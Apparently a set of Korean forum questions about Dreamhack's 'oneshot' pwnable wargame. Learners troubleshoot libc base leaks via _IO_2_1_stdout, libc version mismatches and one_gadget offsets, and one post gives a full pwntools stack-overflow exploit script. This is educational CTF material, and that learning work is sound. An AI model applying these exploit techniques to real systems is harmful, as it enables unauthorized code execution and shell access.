oneshot

1. 질문 사항 특정 버전의 libc 파일이 주어졌을 때, (libc.so.6) 해당 버전을 특정해서 바이너리를 링킹할 수 있는지 궁금합니다. 1-2. 질문 배경 oneshot 워게임 풀이를 하던 도중, 다음과 같이 코드를 작성하여도 stdout = int(str(p.recvline()[2:-1])[2:-1], 16) libc_base = stdout - libc.symbols['IO_2_1_stdout'] print("libc_base : ", hex(libc_base)) #중간 생략 계산한 libc_base의 하위 1.5byte가 0으로 떨어지지 않는 문제가 발생했습니다. 이 때, pwndbg로 print(hex(stdout))의 출력값에 대해, pwndbg로 x/gx 0x{출력값}을 시행한 결과 '\IO_2_1_stdout'에 해당했으므로 stdout을 얻는것 까진 문제가 없습니다. 따라서 로컬 libc 심볼의 오프셋과 libc.so.6의 오프셋이 서로 다를 것이라고 유추했습니다. system 함수로 테스트한 결과 실제로 그런 것을 볼 수 있습니다. (사진의 libc_base의 하위 1.5byte는 삽질하면서 0으로 끼워맞췄습니다 오프셋 다른 것만 봐주세요..!) 이에 로컬에서 익스 코드를 디버깅해보고 싶어서 특정 버전 libc로 링킹하는 방법은 없는지 여쭙니다. 2. 시도해본 것 2-1. zig cc 컴파일러 how can i specify glibc version? 위 링크의 답변을 참고했을 때 zig cc 컴파일러가 유효한 해결 방법인듯 했습니다. 워게임에서 주어진 바이너리의 checksec 조건을 맞춰주고자, 기존 gcc 명령어에 대해 아래와 같이 셋팅했습니다. gcc : gcc -o oneshot1 oneshot1.c -fno-stack-protector -fPIC -pie zig : zig cc -target ./libc.so.6 oneshot.c -o oneshot_zig -fno-stack-protector -frwpi 그런데 아래와 같은 오류만 출력되었습니다. error: unable to parse target query './libc.so.6': UnknownArchitecture `

로컬 환경 : Ubuntu 16.04 (가상머신) 로컬 환경에서 oneshot 바이너리를 대상으로 공격을 진행해보았는데 아래와 같이 에러를 출력해서 질문드립니다. 드림핵의 원격서버에서는 정상적으로 명령이 작동하는데 로컬 환경에서는 동작하지 않습니다.. 무언가 환경설정의 차이 때문인 것 같은데 어떠한 설정이 필요한지 모르겠습니다. [DEBUG] Sent 0x3 bytes: 'ls\n' [*] Process './oneshot' stopped with exit code -11 (SIGSEGV) (pid 11895) [*] Got EOF while sending in interactive `

안녕하세요. 이번 문제를 풀면서, stdout의 주소를 통해 libc_base를 leak하여 풀었는데, libc의 stdout의 offset은 libc_base = libc_stdout - libc.symbols['stdout'] 가 아닌, libc_base = libc_stdout - libc.symbols['IO_2_1_stdout']인 것을 어떻게 알아낼 수 있나요..? readelf -s ./libc.so.6 | grep stdout으로도 stdout 밖에 안나와서 stdout으로 했는데, 왜 이 offset으로 하면 안되는지와, 문제를 풀 때 IO_2_1_stdout 을 symbol으로 어떻게 찾을 수 있는지 궁금합니다. 감사합니다.

페이로드는 payload = "A"24 + p64(0)2 + p64(oneshot_gadget) 이렇게 작성했고 gdb로 attach 해서 리턴 주소에 값이 정확히 들어가는 것을 확인했는데 쉘이 실행되지 않았습니다 oneshot_gadget을 구하기 위해서 아래와 같이 식을 작성하였는데 libc_base = stdout - 0x3c5708 oneshot_gadget = libc_base + 0x45216 제가 생각하는 문제가 되는 부분은 libc_base를 구하는 부분입니다 처음에는 oneshot 파일을 그대로 gdb로 열고 print stdout을 해서 나온 주소에서, vmmap을 해서 나온 /usr/lib/x86_64-linux-gnu/libc-2.31.so의 base 주소(시작 주소)를 뺀 값인 0x1bf6a0를 stdout 값에서 빼줬으나 동작하지 않아 patchelf --replace-needed 명령어로 문제파일에서 주어진 so.6 파일로 변경 후 다시 gdb로 열었습니다 이렇게 하니까 vmmap 으로 봤을 때 변경된 so.6 파일이 열리는것을 확인했는데 문제는 제공된 libc.so.6 파일에 debug simbol이 없어 print stdout이 먹히지 않는다는 것이었습니다 https://typemiss.tistory.com/2 이 사이트를 참고해서 libc6-dbg 패키지를 다운받아 gdb 에서 set도 해보았고 readelf -s ./libc6.so.6 | grep stdout에서 나온 stdout의 오프셋 값도 사용해보았으나 여전히 해결되지 않았습니다 원리는 다 이해한거 같은데 몇 시간째 문제가 해결되지 않아 답답하네요.. 조언 부탁드립니다 (해결) 주어진 libc에서 필요한 데이터를 다 추출해서 풀었습니다 libc 바꿀 필요도 없고 로컬에서 되는거 확인해보지 않아도 되네요

dreamhack강의를 보면 gdb를 통해서 stdout 오프셋 값을 구해서 사용하는 것처럼 oneshot문제에서도 stdout 오프셋을 직접 gdb를 통해 찾아서 익스플로잇을 해봤지만 성공하지 못했습니다. 강의를 보면 라이브러리의 오프셋은 환경이나 라이브러리 마다 다르다고 나와있는데요. 그럼 제 환경에 맞는 오프셋도 실행이 되어야 하는게 아닌가 하는 의문점이 듭니다. 또, 다른 질문자님에 답변을 보며 objdump -D libc.so.6 ~ 을 이용해서 오프셋을 구해서 익스플로잇을 하면 성공하는 것도 확인했는데 다른 점이 뭔지, gdb에서 구한 값은 왜 익스플로잇에 실패하는지 궁금합니다.

안녕하세요 제가 pwnable 'oneshot' 문제를 풀다 도저히 모르겠어서 질문을 올립니다. 아래 코드에서 아무리봐도 페이로드는 맞게 짠거 같은데 쉘이 실행 안되서 오프셋에서 문제가 생긴것으로 추측되어 질문을 드립니다. 뭐가 문제인건가요? from pwn import * #p = remote("host1.dreamhack.games", 21088) p = process('./oneshot') e = ELF("./oneshot") libc = ELF("./libc.so.6") stdout_offset = libc.symbols["IO_2_1_stdout"] one_gadget_offset = 0x045216 p.recvuntil("stdout: ") stdout_address = int(p.recvuntil('\n')[:-1], 16) libc_base = stdout_address - stdout_offset one_gadget_address = libc_base + one_gadget_offset payload = b'A'0x18 + p64(0) + b'B'0x8 + p64(one_gadget_address) p.sendafter("MSG: ", payload) p.interactive()

여러개 중 선택하는 기준이 있을까요? 그냥 brute force하게 넣어보는 방법 뿐인지요? 하나씩 넣다보니까 성공하긴 했는데, 정확한 이유를 알고 싶습니다. 0x45216 execve("/bin/sh", rsp+0x30, environ) constraints: rax == NULL 0x4526a execve("/bin/sh", rsp+0x30, environ) constraints: [rsp+0x30] == NULL 0xf02a4 execve("/bin/sh", rsp+0x50, environ) constraints: [rsp+0x50] == NULL 0xf1147 execve("/bin/sh", rsp+0x70, environ) constraints: [rsp+0x70] == NULL `

안녕하세요 ㅎ

stdout_offset = libc.symbols["IO_2_1_stdout"] 를 통해 libc에 있는 stdout 주소를 확인할 수 있었습니다. wsl환경에서 실제로 주소를 확인해보고 싶어서 파이썬 익스플로잇코드가 아닌 wsl환경에서 readelf를 통해 찾아보려고 하였습니다. readelf -s libc.so.6 | grep 'stdout' -> 는 stdout이 코드 실행 내부에서 실제로 stdout을 가리키는 포인터 주소임으로 이해했는데 맞는지 궁금합니다. gdb 내에서 print stdout 을 통해 (FILE *) 0x7ffff7fa65c0 <IO_2_1_stdout> 를 확인하였고 IO_2_1_stdout 임을 확인했는데 이 것을 wsl 내부 경로에서 readelf -s libc.so.6 | grep 'IO_2_1_stdout' 로 했을 때 뜨는게 아무것도 없습니다. 이유가 뭔지 궁금합니다.

gdb에서 oneshot 프로그램 실행시켜서 stdout 이름 알아냈습니다. 그런데 libc.so.6을 gdb로 열어서 print IO_2_1_stdout 하면 검색이 안되네요... 어떻게 검색해야될까요?